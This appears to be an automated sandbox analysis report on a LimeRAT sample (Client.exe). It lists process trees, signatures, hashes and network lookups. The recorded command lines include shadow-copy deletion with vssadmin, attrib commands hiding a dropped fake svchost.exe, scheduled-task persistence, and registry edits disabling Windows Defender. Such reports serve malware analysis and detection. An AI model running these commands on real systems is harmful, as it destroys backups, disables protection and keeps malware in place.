PID 5056 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4848 wrote to memory of 4108 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4848 wrote to memory of 4108 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4724 wrote to memory of 4644 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4724 wrote to memory of 4644 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4312 wrote to memory of 2364 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4312 wrote to memory of 2364 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5076 wrote to memory of 2440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5076 wrote to memory of 2440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3232 wrote to memory of 64 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3232 wrote to memory of 64 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 436 wrote to memory of 4448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 436 wrote to memory of 4448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4020 wrote to memory of 1188 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4020 wrote to memory of 1188 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1604 wrote to memory of 3628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1604 wrote to memory of 3628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3816 wrote to memory of 4656 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2744 wrote to memory of 2992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2744 wrote to memory of 2992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 408 wrote to memory of 1556 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 408 wrote to memory of 1556 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4376 wrote to memory of 4072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4376 wrote to memory of 4072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3056 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3056 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5056 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5056 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5056 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5056 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:30" /sc daily /mo "4" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "15:00" /sc daily /mo "4" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "18:27" /sc daily /mo "1" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:11" /sc weekly /mo "5" /d "Sat" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:55" /sc monthly /m "jan" /tn "StartComponentCleanup" /tr "'explorer'http://bit.ly/38cVfe5"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 ftp.encompossoftware.com udp

Files

memory/5056-0-0x00007FF8AF063000-0x00007FF8AF065000-memory.dmp

memory/5056-1-0x0000023D80EC0000-0x0000023D80F02000-memory.dmp

memory/5056-2-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/4688-3-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdatmkki.eys.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4688-13-0x000001C96B4E0000-0x000001C96B502000-memory.dmp

memory/4688-14-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/4688-15-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/4688-18-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

memory/5056-20-0x00007FF8AF063000-0x00007FF8AF065000-memory.dmp

memory/5056-21-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 16deda7a7a2e8f354fbff30ad723a711
SHA1 8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512 6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

memory/5056-33-0x00007FF8AF060000-0x00007FF8AFB21000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-19 22:06

Reported

2024-06-19 22:26

Platform

win11-20240419-en

Max time kernel

1197s

Max time network

1198s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2796 wrote to memory of 544 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2796 wrote to memory of 544 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2796 wrote to memory of 4860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2796 wrote to memory of 4860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2684 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2684 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4780 wrote to memory of 1400 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4780 wrote to memory of 1400 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 664 wrote to memory of 4472 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 664 wrote to memory of 4472 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2304 wrote to memory of 2348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2304 wrote to memory of 2348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3740 wrote to memory of 2316 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3740 wrote to memory of 2316 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3900 wrote to memory of 4876 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3900 wrote to memory of 4876 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2220 wrote to memory of 4240 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2220 wrote to memory of 4240 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3908 wrote to memory of 1692 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3908 wrote to memory of 1692 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1948 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1948 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1916 wrote to memory of 420 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1916 wrote to memory of 420 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4600 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4600 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1352 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1352 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3944 wrote to memory of 1904 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3944 wrote to memory of 1904 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2684 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2684 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2684 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2684 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

